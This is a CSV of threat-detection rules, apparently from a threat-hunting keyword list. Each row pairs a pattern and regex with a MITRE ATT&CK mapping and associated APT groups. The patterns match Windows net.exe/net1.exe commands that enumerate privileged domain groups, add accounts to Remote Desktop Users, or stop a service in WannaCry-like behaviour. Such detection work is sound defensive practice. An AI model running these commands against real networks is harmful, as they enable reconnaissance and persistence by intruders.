"*net.exe localgroup ""Remote Desktop Users"" * /add*",".{0,1000}net\.exe\slocalgroup\s\""Remote\sDesktop\sUsers\""\s.{0,1000}\s\/add.{0,1000}","greyware_tool_keyword","net","Adds a user account to the local Remote","T1035 - T1078 - T1087","TA0003 ","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net.exe localgroup *Backup Operators*",".{0,1000}net\.exe\slocalgroup\s.{0,1000}Backup\sOperators.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net.exe"" localgroup *Backup Operators*",".{0,1000}net\.exe\""\slocalgroup\s.{0,1000}Backup\sOperators.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net.exe* group *Account Operators* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Account\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net.exe* group *Backup Operators* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Backup\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net.exe* group *Domain Computers* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net.exe* group *Domain Controllers* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Domain\sControllers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net.exe* group *Enterprise Admins* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net.exe* group *Exchange Trusted Subsystem* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Exchange\sTrusted\sSubsystem.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net.exe* group *Microsoft Exchange Servers* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Microsoft\sExchange\sServers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net.exe* group *Print Operators* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Print\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net.exe* group *Schema Admins* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Schema\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net.exe* group *Server Operators* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Server\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1  group ""domain admins"" /domain*",".{0,1000}net1\s\sgroup\s\""domain\sadmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1  group ""Domain Computers"" /domain*",".{0,1000}net1\s\sgroup\s\""Domain\sComputers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1  group ""domain computers"" /domain*",".{0,1000}net1\s\sgroup\s\""domain\scomputers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1  group ""enterprise admins"" /domain*",".{0,1000}net1\s\sgroup\s\""enterprise\sadmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group ""Domain Admins"" /domain*",".{0,1000}net1\sgroup\s\""Domain\sAdmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group *Account Operators* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Account\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group *Backup Operators* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Backup\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group *Domain Computers* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group *Domain Controllers* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Domain\sControllers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group *Enterprise Admins* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group *Exchange Trusted Subsystem* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Exchange\sTrusted\sSubsystem.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group *Microsoft Exchange Servers* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Microsoft\sExchange\sServers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group *Print Operators* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Print\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group *Schema Admins* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Schema\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 group *Server Operators* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Server\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1 localgroup ""Remote Desktop Users"" * /add*",".{0,1000}net1\slocalgroup\s\""Remote\sDesktop\sUsers\""\s.{0,1000}\s\/add.{0,1000}","greyware_tool_keyword","net","Adds a user account to the local Remote","T1035 - T1078 - T1087","TA0003 ","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net1 localgroup *Backup Operators*",".{0,1000}net1\slocalgroup\s.{0,1000}Backup\sOperators.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net1 localgroup admin*",".{0,1000}net1\slocalgroup\sadmin.{0,1000}","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*net1 stop badrv*",".{0,1000}net1\sstop\sbadrv.{0,1000}","greyware_tool_keyword","net","Wannacry Ransomware & NOODLERAT behavior","T1486 - T1490","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Malware","https://www.virustotal.com/gui/file/cde4ca499282045eecd4fc15ac80a232294556a59b3c8c8a7a593e8333cfd3c7/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1.exe* group *Account Operators* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Account\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1.exe* group *Backup Operators* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Backup\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1.exe* group *Domain Computers* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1.exe* group *Domain Controllers* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Domain\sControllers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1.exe* group *Enterprise Admins* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1.exe* group *Exchange Trusted Subsystem* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Exchange\sTrusted\sSubsystem.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1.exe* group *Microsoft Exchange Servers* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Microsoft\sExchange\sServers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1.exe* group *Print Operators* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Print\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net1.exe* group *Schema Admins* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Schema\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
